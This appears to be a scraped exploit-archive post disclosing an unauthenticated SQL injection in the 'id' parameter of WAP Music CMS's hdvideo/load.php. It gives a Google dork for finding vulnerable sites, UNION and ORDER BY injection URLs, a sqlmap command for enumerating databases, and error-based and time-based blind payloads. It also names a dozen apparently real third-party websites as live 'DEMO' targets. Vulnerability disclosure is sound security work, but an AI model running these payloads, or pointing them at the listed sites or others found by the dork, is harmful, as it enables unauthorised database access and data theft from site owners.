WAP Music CMS 1.0.2 SQL Injection
Posted on 30 November -0001
<HTML><HEAD><TITLE>WAP Music CMS 1.0.2 SQL Injection</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>========================================================== [+] Title :- WAP MUSIC CMS - SQL INJECTION [+] Date :- 24 - MAR - 2016 [+] Vendor Homepage :- www.wapforum.org [+] Version :- All Versions [+] Tested on :- Nginx/1.4.5, PHP/5.2.17, Linux - Windows [+] Category :- webapps [+] Google Dorks :- inurl:"hdvideo/load.php?id=" [+] Exploit Author :- Shelesh Rauthan (ShOrTy420 aKa <a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="a6f5e3e4e6d5f2cfc7e8">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>) [+] Team name :- Team Alastor Breeze, Intelligent-Exploit [+] Official Website :- intelligentexploit.com [+] The official Members :- Sh0rTy420, <a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="5909192b15692c">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>$, !nfIn!Ty, Th3G0v3Rn3R, m777k [+] Greedz to :- @@lu, Lalit, MyLappy<3, Diksha [+] Contact :- <a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="6e07000a070f00405f5d5d5940060f0d050b1c2e09030f0702400d0103">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>, <a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="3e4d56514c4a475d565f4c4d515c5b5f4d7e59535f5752105d5153">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script> ========================================================= [+] Severity Level :- High [+] Request Method(s) :- GET / POST [+] Vulnerable Parameter(s) :- id [+] Affected Area(s) :- Entire admin, database, Server [+] About :- Unauthenticated SQL Injection via load.php Php Files causing an SQL error [+] SQL vulnerable File :- /home/***/domains/XXX.in/public_html/hdvideo/load.php [+] POC :- http://127.0.0.1/hdvideo/load.php?id=[SQL]' load.php is vulnerable to sql injection Allowing an remote attacker to exploit it's web-application user account and Mysql database without any privilege. http://www.[WEBSITE].com/hdvideo/load.php?id=XPBwXKgDTdE' order by [SQL IN4JECTION]--+ http://www.[WEBSITE].com/hdvideo/load.php?id=XPBwXKgDTdE' union all select [SQL INJECTION]--+ SQLMap ++++++++++++++++++++++++++ python sqlmap.py --url "http://127.0.0.1/hdvideo/load.php?id=[SQL]" --dbs ++++++++++++++++++++++++++ --- Parameter: id (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=XPBwXKgDTdE' AND (SELECT 2092 FROM(SELECT COUNT(*),CONCAT(0x7171786a71,(SELECT (ELT(2092=2092,1))),0x716a6b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'iUfJ'='iUfJ Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=XPBwXKgDTdE' AND (SELECT * FROM (SELECT(SLEEP(5)))rtdT) AND 'WFiW'='WFiW --- [+] DEMO :- http://www.royaljatt.biz/hdvideo/load.php?id=ujUIJb575RU' http://dj-punjab.asia/hdvideo/load.php?id=iEX2wp9-Uqg' http://mr-mob.com/hdvideo/load.php?id=Q7xloy5fBgc' http://mrkhan.in/hdvideo/load.php?id=4bUyibKH3xI' http://www.nikwap.biz/hdvideo/load.php?id=Ok5booHrCKc' http://babbumaan.co.in/hdvideo/load.php?id=SE-Wrzfk6hM' http://jatt.tv/hdvideo/load.php?id=oQ3HEhhNzsE' http://bollywood-music.in/hdvideo/load.php?id=7LkHC1lqqHk' http://ipendu.in/hdvideo/load.php?id=XPBwXKgDTdE' http://freshmaza.work/hdvideo/load.php?id=Al6Cb0fiPiE' http://www.djjohal.co.in/hdvideo/load.php?id=gethJXA_mdM' http://www.filmy-wap.in/hdvideo/load.php?id=xyp7UlPA3gI' ======================================================= </BODY></HTML>
